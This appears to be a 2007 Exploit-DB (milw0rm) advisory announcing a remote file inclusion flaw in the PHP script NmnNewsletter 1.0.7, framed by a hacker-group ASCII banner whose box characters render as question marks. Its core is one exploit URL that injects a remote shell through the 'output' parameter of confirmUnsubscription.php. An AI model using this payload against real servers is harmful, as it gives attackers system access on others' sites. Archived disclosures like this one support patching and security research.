NmnNewsletter 1.0.7 - 'output' Remote File Inclusion

EDB-ID:

4763


Author:

CraCkEr

Type:

webapps


Platform:

PHP

Date:

2007-12-21


???????????????????????????????????????????????????????????????????????????????
??                             C r a C k E r                                ??
??          T H E   C R A C K   O F   E T E R N A L   M I G H T             ??
??????????????????????????????????????????????????????????????????????????????

 ?????      From The Ashes and Dust Rises An Unimaginable crack....     ?????
??????????????????????????????????????????????????????????????????????????????
??                         [ Remote File Include ]                         ??
??????????????????????????????????????????????????????????????????????????????
:   Author     : CraCkEr              : :                                    :
?   Group      : PitBull Crew         ? ?                                    ?
?   Script     : NmnNewsletter 1.0.7  ? ?         Register_globals :         ?
?   Download   : SourceForge.net      ? ?                                    ?
?   Method     : GET                  ? ?          [?] ON   [ ] OFF          ?
?   Critical   : High [????????]      ? ?                                    ?
?   Impact     : System access        ? ?                                    ?
? ????????????????????????????????????? ???????????????????????????????????? ?
?                              DALnet #crackers                             ??
??????????????????????????????????????????????????????????????????????????????
:                                                                            :
?  Release Notes:                                                            ?
?  ?????????????                                                             ?
?  Typically used for remotely exploitable vulnerabilities that can lead to  ?
?  system compromise.                                                        ?
?                                                                            ?

??????????????????????????????????????????????????????????????????????????????
??                             Exploit URL's                               ??
??????????????????????????????????????????????????????????????????????????????
  ?????????????????????????????????????????????????????????????????????????
       http://localhost/path/confirmUnsubscription.php?output=[SHELL]    
   
 ????????????????????????????????????????????????????????????????????????????
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, S|AyER, Ehab, Tfaces, Guzman, adal,
       Karlousha, Od3d99aa. Mark, Ramzi, Lust, DeaD, xD

??????????????????????????????????????????????????????????????????????????????
??                              © CraCkEr 2007                             ??
??????????????????????????????????????????????????????????????????????????????

# milw0rm.com [2007-12-21]